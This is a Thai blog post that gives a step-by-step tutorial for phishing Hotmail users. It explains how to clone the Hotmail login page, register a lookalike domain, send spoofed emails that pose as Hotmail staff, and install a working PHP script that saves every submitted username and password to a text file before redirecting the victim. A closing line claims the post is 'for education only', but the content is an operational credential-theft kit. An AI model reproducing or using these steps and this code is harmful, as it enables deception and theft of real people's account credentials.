เรียนรู้การทำ Phishing
จากการที่ผม ได้ลองทำดูก็กินเวลาไปหลายวันอยู่เพราะผมไม่มีึความรู้ในการเขียนเวป
การทำโฮสต์ ต่างๆเลยต้องเรียนรู้ก่อนสักนิด แต่ผมว่าคนที่เขียนเวปได้น่าจะทำได้ง่ายนะครับ
อย่างแรกก็คือสร้าง เวปและโฮสต์ให้มีลักษณะเหมือนเวปต้นแบบมากที่สุด
ในรูปจะเห็นผมมีไฟล์ อยู่2ไฟล์ login.php คือไฟล์หน้าเวปที่จะให้คนเข้ามาlogin
ส่วน phishing.php คือไฟล์ที่เซฟรหัสเมื่อคนloginในหน้าเวป
หาเป้าหมายแล้วทำให้เขาเข้ามาloginในเวปของเรา ของผมใช้วิธีส่งเมลเอาครับ
ปลอม อีเมลเอาสักหน่อยให้เหมือนกับว่าทางhotmailส่งมา
ข้อความในเมล (จากรูปโฮสต์ของผมยังไม่เหมือนกับทางhotmail)
เมื่อเป้าหมายกดลิ้งค์ที่เราส่งไป ก็จะมายังหน้าเวปของเรา
เมื่อเป้าหมายloginในหน้าเวปของเราก็จะได้ไฟล์ passwords.txt มา (ไฟล์ passwords.txt มาจาก phishing.php)
ถายในไฟล์ passwords.txt จะมีรหัสของเป้าหมายอยู่
ฟังผมบ่นมานานละมาดูการทำดีกว่า เอาของ hotmail ก็แล้วกัน
1.ไป ที่หน้าเวป login ของ hotmail แล้วให้คัดลอกโค้ตหน้าเวปมา แล้วเซปชื่อว่า login.php
2.ลงทะเบียนโฮสต์ให้เหมือนกับ hotmail เช่น www.hotmaill.com เป็นต้น
3.ถ้าคุณสามารถที่จะ ปลอมอีเมลได้ก็ข้ามขั้นตอนนี้ไป ส่วนคนที่ทำไม่ได้ก็ให้ ไปสมัครอีเมล ประมานว่าคนเห็นแล้วเชื่อว่าเป็นเมลของทางทีมงาน
4.คัดลองโค้ตนี้ไป แล้วเซฟว่า phishing.php
[Copy]
- <?php
- header ('Location: http://YOUR HOST LINK/login.php ');
- $handle = fopen("passwords.txt", "a");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- fwrite($handle, "\r\n");
- fclose($handle);
- exit;
- ?>
[Copy]
- action="http://YOUR HOST LINK/phishing.php?login_attempt=1">
6.เมื่อมีคนเข้ามา login เราก็จะได้ passwords.txt รหัสก็จะอยู่ข้างในนั้น
ขอขอบคุณ คุณ βЧ...ɢ∂мєzک ครับ ที่ให้คำแนะนำและกำลังใจ
ใช้ในด้านการศึกษานะ ครับ อย่าเอาไปสร้างเดือดร้อนให้ใคร
ไม่มีความคิดเห็น:
แสดงความคิดเห็น